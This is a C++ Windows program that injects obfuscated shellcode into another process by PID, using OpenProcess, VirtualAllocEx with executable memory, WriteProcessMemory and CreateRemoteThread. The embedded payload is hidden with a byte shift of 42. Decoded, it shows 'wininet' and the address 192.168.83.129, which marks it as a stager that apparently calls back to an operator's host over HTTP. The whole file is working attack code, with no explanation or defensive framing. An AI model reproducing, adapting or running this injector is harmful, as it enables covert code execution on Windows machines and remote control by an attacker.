#include <iostream>
#include <windows.h>


void cc(char* data, size_t data_len, int offset) {

    int i = 0;

    do {

        data[i] = (int(data[i]) - offset % 255);
        i++;
    } while (i < data_len - 1);
}

int main(int argc, char* argv[]) {

    HANDLE hProc;
    HANDLE hThread;
    PVOID rBuf;
    DWORD pid = atoi(argv[1]);
    unsigned int defconwifi_len;

    unsigned char defconwifi[] =
        "\x26\x72\xad\x0e\x1a\x12\xf6\x2a\x2a\x2a\x6b\x7b\x6b\x7a\x7c"
        "\x72\x5b\xfc\x8f\x72\xb5\x7c\x8a\x7b\x72\xb5\x7c\x42\x80\x72"
        "\xb5\x7c\x4a\x77\x5b\xf3\x72\xb5\x9c\x7a\x72\x39\xe1\x74\x74"
        "\x72\x5b\xea\xd6\x66\x8b\xa6\x2c\x56\x4a\x6b\xeb\xf3\x37\x6b"
        "\x2b\xeb\x0c\x17\x7c\x6b\x7b\x72\xb5\x7c\x4a\xb5\x6c\x66\x72"
        "\x2b\xfa\x90\xab\xa2\x42\x35\x2c\x39\xaf\x9c\x2a\x2a\x2a\xb5"
        "\xaa\xb2\x2a\x2a\x2a\x72\xaf\xea\x9e\x91\x72\x2b\xfa\x7a\xb5"
        "\x72\x42\x6e\xb5\x6a\x4a\x73\x2b\xfa\x0d\x80\x77\x5b\xf3\x72"
        "\x29\xf3\x6b\xb5\x5e\xb2\x72\x2b\x00\x72\x5b\xea\x6b\xeb\xf3"
        "\x37\xd6\x6b\x2b\xeb\x62\x0a\x9f\x1b\x76\x2d\x76\x4e\x32\x6f"
        "\x63\xfb\x9f\x02\x82\x6e\xb5\x6a\x4e\x73\x2b\xfa\x90\x6b\xb5"
        "\x36\x72\x6e\xb5\x6a\x46\x73\x2b\xfa\x6b\xb5\x2e\xb2\x6b\x82"
        "\x72\x2b\xfa\x6b\x82\x88\x83\x84\x6b\x82\x6b\x83\x6b\x84\x72"
        "\xad\x16\x4a\x6b\x7c\x29\x0a\x82\x6b\x83\x84\x72\xb5\x3c\x13"
        "\x75\x29\x29\x29\x87\x72\x5b\x05\x7d\x73\xe8\xa1\x93\x98\x93"
        "\x98\x8f\x9e\x2a\x6b\x80\x72\xb3\x0b\x73\xf1\xec\x76\xa1\x50"
        "\x31\x29\xff\x7d\x7d\x72\xb3\x0b\x7d\x84\x77\x5b\xea\x77\x5b"
        "\xf3\x7d\x7d\x73\xe4\x64\x80\xa3\xd1\x2a\x2a\x2a\x2a\x29\xff"
        "\x12\x39\x2a\x2a\x2a\x5b\x63\x5c\x58\x5b\x60\x62\x58\x62\x5d"
        "\x58\x5b\x5c\x63\x2a\x84\x72\xb3\xeb\x73\xf1\xea\x25\x4a\x2a"
        "\x2a\x77\x5b\xf3\x7d\x7d\x94\x2d\x7d\x73\xe4\x81\xb3\xc9\xf0"
        "\x2a\x2a\x2a\x2a\x29\xff\x12\x67\x2a\x2a\x2a\x59\x7d\x63\x7f"
        "\x84\x80\x7f\x7b\x57\x9e\x9c\x76\x99\x78\x8f\x95\x5d\x93\x9d"
        "\x5f\x80\x60\x91\x7a\x7f\x80\xa4\x5b\x5f\x74\x97\x5b\xa3\x6e"
        "\x5f\x82\x6c\x80\x77\x5d\x5f\x8d\x92\x90\x98\x74\x62\x99\x84"
        "\x61\x5d\x73\x9a\x77\xa1\x99\x77\x78\x84\x9d\x2a\x72\xb3\xeb"
        "\x7d\x84\x6b\x82\x77\x5b\xf3\x7d\x72\xe2\x2a\x2c\x52\xae\x2a"
        "\x2a\x2a\x2a\x7a\x7d\x7d\x73\xf1\xec\x15\x7f\x58\x65\x29\xff"
        "\x72\xb3\xf0\x94\x34\x89\x7d\x84\x72\xb3\x1b\x77\x5b\xf3\x77"
        "\x5b\xf3\x7d\x7d\x73\xf1\xec\x57\x30\x42\xa5\x29\xff\xaf\xea"
        "\x9f\x49\x72\xf1\xeb\xb2\x3d\x2a\x2a\x73\xe4\x6e\x1a\x5f\x0a"
        "\x2a\x2a\x2a\x2a\x29\xff\x72\x29\xf9\x9e\x2c\x15\xf6\x12\x7f"
        "\x2a\x2a\x2a\x7d\x83\x94\x6a\x84\x73\xb3\xfb\xeb\x0c\x3a\x73"
        "\xf1\xea\x2a\x3a\x2a\x2a\x73\xe4\x82\xce\x7d\x0f\x2a\x2a\x2a"
        "\x2a\x29\xff\x72\xbd\x7d\x7d\x72\xb3\x11\x72\xb3\x1b\x72\xb3"
        "\x04\x73\xf1\xea\x2a\x4a\x2a\x2a\x73\xb3\x23\x73\xe4\x3c\xc0"
        "\xb3\x0c\x2a\x2a\x2a\x2a\x29\xff\x72\xad\xee\x4a\xaf\xea\x9e"
        "\xdc\x90\xb5\x31\x72\x2b\xed\xaf\xea\x9f\xfc\x82\xed\x82\x94"
        "\x2a\x83\x73\xf1\xec\x1a\xdf\xcc\x80\x29\xff";

    defconwifi_len = sizeof(defconwifi);

    // do shit
    hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    rBuf = VirtualAllocEx(hProc, 0, defconwifi_len, MEM_COMMIT | MEM_RESERVE, 0x40);
    cc((char*)defconwifi, defconwifi_len, 42);
    WriteProcessMemory(hProc, rBuf, defconwifi, defconwifi_len, NULL);
    hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)rBuf, NULL, NULL, NULL);
    CloseHandle(hProc);
    return 0;

}